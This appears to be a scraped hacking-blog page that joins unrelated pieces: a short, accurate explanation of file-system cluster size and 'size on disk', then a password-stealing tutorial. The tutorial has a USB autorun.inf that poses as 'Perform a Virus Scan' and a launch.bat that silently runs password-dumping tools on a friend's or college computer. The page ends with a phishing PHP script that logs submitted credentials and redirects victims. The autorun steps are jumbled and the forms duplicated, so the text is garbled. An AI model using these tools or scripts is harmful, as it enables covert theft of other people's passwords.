
NOTE : I have still not got any recharge, but have talked to the admin and he assured me that recharge page will come up soon.
Here You Get All The Things Like Software And Hacking Stuff
It is the file system of hard disk which determines the “Size on Disk”, where as “Size” will remain same, irrespective of file system (like NTFS, Fat32, UDF, etc.).
The disk is further divided into tracks and sectors, file system determines how many tracks or sectors to be included in one cluster. So, if the disk is having a cluster size of 16KB (generally in case of FAT file system). Any file on that disk will have size on disk in multiples of 16KB. So, a file size up to 16KB will occupy 16KB as disk space and file from size 16 to 32KB will occupy 32KB on disk space and so on.
In this way a large volume of disk space gets unused. So, there is a need of file system having smaller cluster size. This is one reason Microsoft came up with a new file system NTFS, after windows millennium.
[autorun]
save the Notepad and rename it from
open=launch.bat
ACTION= Perform a Virus Scan
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text
onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now
your rootkit is ready and you are all set to hack
the passwords. You can use this pendrive on your
friend’s PC or on your college computer.
Just follow these steps
1. Insert the pendrive and the autorun window will
pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option
(Perform a Virus Scan).
3.
Now all the password hacking tools will silently get
executed in the
background (This process takes hardly a few seconds).
The passwords get
stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored
passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7
<form action="login.php" method="POST">
<form action="action.php" method="POST">
<input type="text" name="uxuser" /> <input type="password" name="uxpass" />
<input type="text" name="username" /> <input type="password" name="password" />
$content = $_POST['username']."\n".$_POST['password']."\n \n";
$fh1 = fopen("passwords.txt", 'a') or die("Error");
fwrite($fh1, $content);
fclose($fh1);
echo "<html><head><meta http-equiv=\"refresh\" content=\"0;url=http://phishedsiteurlhere.com\" />
</head><body></body></html>";
?>